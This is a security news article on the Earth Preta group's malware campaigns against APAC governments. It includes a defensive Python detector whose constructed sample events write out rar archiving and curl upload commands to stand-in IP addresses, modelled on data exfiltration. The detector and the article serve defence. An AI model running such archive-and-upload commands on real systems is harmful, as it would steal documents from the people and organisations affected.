Earth Preta Escalates APAC Attacks with New Malware
The hacker group Earth Preta has intensified its campaigns against government institutions in the Asia-Pacific region (APAC). According to Trend Micro, the attackers have refined their attack methods and deployed new malware.
One of the key tools in these attacks is a modified version of the HIUPAN worm, which spreads via removable media. The worm delivers the primary payload, PUBLOAD, which lets the attackers control infected devices and execute commands to collect data and transmit it to their servers.
In the latest infection scheme, HIUPAN initiates the attack by transferring malicious files to removable drives. Once the drive is connected to a new device, the worm discreetly infects it, concealing its files from the user. The latest version of HIUPAN is notable for its simplified configuration and enhanced management of its spread. The malicious code is stored in the ProgramData directory, making it more difficult to detect.
The main objective of the PUBLOAD program is to gather system information and perform network mapping. The malware executes commands to identify active processes, network connections, and device configurations. To achieve these tasks, PUBLOAD uses both standard Windows utilities and its own tools for data exfiltration.
In addition to the HIUPAN worm and PUBLOAD, two additional tools were employed in the new attack. FDMTP is a simple downloader that uses encryption to evade antivirus detection, while PTSOCKET facilitates the transfer of files to remote servers using a multithreaded mode, accelerating the data exfiltration process.
The attackers’ primary goal is to collect documents in various formats, including .doc, .xls, .pdf, and .ppt. Once collected, the files are archived with the RAR archiver and transferred to Earth Preta’s servers via cURL commands. Where cURL is not used, PTSOCKET handles the data transmission.
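As an added defensive example (not code from the Trend Micro report or this article), the script below flags the collection-and-exfiltration sequence described above, a RAR archive of document types followed shortly by a cURL upload from the same host, over constructed process-creation events; the host names, paths and URLs are invented sample data, and the upload flags checked are an assumption about how cURL would be driven.

```python
"""Detect a rar.exe document archive followed by a curl.exe upload on the
same host. Events are constructed, Sysmon-like process-creation records."""
import re
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, host, image, command line)
EVENTS = [
    ("2024-09-10 08:01:00", "WS-01", "rar.exe",
     r"rar.exe a -r C:\ProgramData\tmp\out.rar *.doc *.xls *.pdf *.ppt"),
    ("2024-09-10 08:09:30", "WS-01", "curl.exe",
     r"curl.exe -T C:\ProgramData\tmp\out.rar http://203.0.113.10/upload"),
    ("2024-09-10 09:00:00", "WS-02", "rar.exe",
     r"rar.exe a backup.rar C:\src\*.cpp"),            # benign: no documents
    ("2024-09-10 09:05:00", "WS-02", "curl.exe",
     r"curl.exe -s https://example.org/health"),       # benign: no upload
    ("2024-09-11 12:00:00", "WS-03", "rar.exe",
     r"rar.exe a docs.rar *.pdf"),
    ("2024-09-11 14:00:00", "WS-03", "curl.exe",       # 2h later: outside window
     r"curl.exe --upload-file docs.rar http://198.51.100.7/"),
]

# Document types the report says the group collects (plus the Office x-variants)
DOC_EXT = re.compile(r"\.(doc|xls|pdf|ppt)x?\b", re.IGNORECASE)
# cURL options that push a local file or request body to a remote server
UPLOAD_FLAG = re.compile(r"(?:^|\s)(-T|--upload-file|-F|--form|-d|--data\S*)(?:\s|$)")


def find_exfil_chains(events, window_minutes=30):
    """Return (host, rar_cmdline, curl_cmdline) for each rar.exe document
    archive followed by a curl.exe upload on the same host within the window."""
    window = timedelta(minutes=window_minutes)
    parsed = sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, img.lower(), cmd)
        for ts, host, img, cmd in events)
    hits = []
    for i, (t_rar, host, img, rar_cmd) in enumerate(parsed):
        if img != "rar.exe" or not DOC_EXT.search(rar_cmd):
            continue
        for t_curl, host2, img2, curl_cmd in parsed[i + 1:]:
            if t_curl - t_rar > window:      # events are time-sorted: stop here
                break
            if host2 == host and img2 == "curl.exe" and UPLOAD_FLAG.search(curl_cmd):
                hits.append((host, rar_cmd, curl_cmd))
                break
    return hits


if __name__ == "__main__":
    for host, rar_cmd, curl_cmd in find_exfil_chains(EVENTS):
        print(f"[{host}] {rar_cmd}\n    -> {curl_cmd}")
```

Widening `window_minutes` also catches the WS-03 pair, which shows why the correlation window should be tuned to how long staged archives typically sit before upload.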
Recent attacks have also included phishing campaigns. The hackers sent victims emails containing malicious links that led to the download of the DOWNBAIT loader, which subsequently delivered and executed the PlugX backdoor, ensuring long-term access to the victim’s system.
Based on the analysis of phishing emails and decoy documents, it was determined that Earth Preta primarily targeted government institutions and entities associated with defense, foreign policy, and education across APAC countries. Victims included organizations from Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan.
Earth Preta continues to enhance its tools and attack methods, making its threat particularly relevant to governmental and corporate entities in the APAC region. The use of removable media for malware distribution, phishing emails for initial payload delivery, and new data exfiltration techniques all point to the group’s high level of adaptability. Cybersecurity professionals must remain vigilant and actively update their defenses to counter new Earth Preta attacks.